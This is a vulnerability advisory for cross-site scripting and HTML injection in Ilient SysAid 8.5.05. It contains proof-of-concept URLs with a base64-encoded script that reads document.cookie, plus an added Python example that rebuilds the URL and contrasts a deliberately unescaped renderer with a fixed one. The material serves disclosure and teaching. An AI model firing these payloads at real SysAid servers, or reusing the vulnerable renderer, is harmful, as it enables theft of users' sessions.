source: https://www.securityfocus.com/bid/52356/info

Ilient SysAid is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and the HTML-injection issues to control how the site is rendered to the user. Either may let the attacker steal cookie-based authentication credentials and launch other attacks.

Ilient SysAid 8.5.05 is vulnerable; other versions may also be affected.

HTML injection (rendered fragment of the proof of concept, as preserved on the page):

Administrators online
1 Users
Julien Ahrens

Cross-site scripting, non-persistent (listViewName parameter, Customize list - Assets):

http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Assets&listViewName=

or base64 encoded:

http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Service%20Requests&srType=1&listViewName=BASE64@PHNjcmlwdD5hbGVydChlc2NhcGUoZG9jdW1lbnQuY29va2llKSk8L3NjcmlwdD4=

The base64 value decodes to <script>alert(escape(document.cookie))</script>.
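The following is an added worked example, not code from the advisory or from SysAid. It decodes the advisory's BASE64@ value, rebuilds the proof-of-concept URL from the parameter names the advisory shows, and places a hypothetical reflecting JSP-style renderer beside its hardened form. The server-side BASE64@ decoding step is an assumption inferred from the second URL; the real SysAid handling of listViewName is not on the page. The practical caveat it demonstrates: the output encoding has to happen after any decoding the application performs, or the decode step undoes the escaping.

```python
import base64
import html
from typing import Optional
from urllib.parse import quote, urlencode

# Base64 value quoted in the advisory (line-wrap space removed).
ADVISORY_B64 = "PHNjcmlwdD5hbGVydChlc2NhcGUoZG9jdW1lbnQuY29va2llKSk8L3NjcmlwdD4="
# Marker seen in the advisory URL; assumed to be a SysAid parameter convention.
BASE64_PREFIX = "BASE64@"
# Host and path exactly as given in the advisory.
BASE_URL = "http://www.example.com:8080/sysaid/CustomizeListView.jsp"


def decode_advisory_payload(b64: str = ADVISORY_B64) -> str:
    """Return the plaintext behind the advisory's BASE64@ value."""
    return base64.b64decode(b64).decode("utf-8")


def encode_list_view_name(payload: str) -> str:
    """Produce a listViewName value in the BASE64@<b64> form the advisory uses."""
    return BASE64_PREFIX + base64.b64encode(payload.encode("utf-8")).decode("ascii")


def build_poc_url(payload: str, list_name: str = "Assets",
                  sr_type: Optional[int] = None) -> str:
    """Assemble a proof-of-concept URL from the parameter names in the advisory.

    '@' and '=' are left unencoded so the value matches the advisory's form.
    """
    params = {"listName": list_name}
    if sr_type is not None:
        params["srType"] = sr_type
    params["listViewName"] = encode_list_view_name(payload)
    return BASE_URL + "?" + urlencode(params, safe="@=", quote_via=quote)


def resolve_list_view_name(raw: str) -> str:
    """Hypothetical server-side handling: honour the BASE64@ convention before use.

    This mirrors what the advisory's second URL implies the page does; the real
    SysAid code is not on the page.
    """
    if raw.startswith(BASE64_PREFIX):
        return base64.b64decode(raw[len(BASE64_PREFIX):]).decode("utf-8", "replace")
    return raw


def render_title_vulnerable(raw_list_view_name: str) -> str:
    """Hypothetical renderer reflecting the parameter unescaped: the bug class
    the advisory describes. Whatever the client sent ends up in the markup."""
    name = resolve_list_view_name(raw_list_view_name)
    return f"<h2>Customize list view: {name}</h2>"


def render_title_fixed(raw_list_view_name: str) -> str:
    """Same output, but the value is HTML-entity-encoded AFTER the BASE64@
    decode, so the attacker cannot smuggle markup past the escaping by
    encoding it."""
    name = resolve_list_view_name(raw_list_view_name)
    return f"<h2>Customize list view: {html.escape(name, quote=True)}</h2>"


if __name__ == "__main__":
    payload = decode_advisory_payload()
    print("decoded payload:", payload)
    print("PoC URL:", build_poc_url(payload, list_name="Service Requests", sr_type=1))
    raw = encode_list_view_name(payload)
    print("vulnerable:", render_title_vulnerable(raw))
    print("fixed:     ", render_title_fixed(raw))
```

Running the block prints the decoded script, the reconstructed second URL, and the two renderings; only the vulnerable one contains a live `<script>` element.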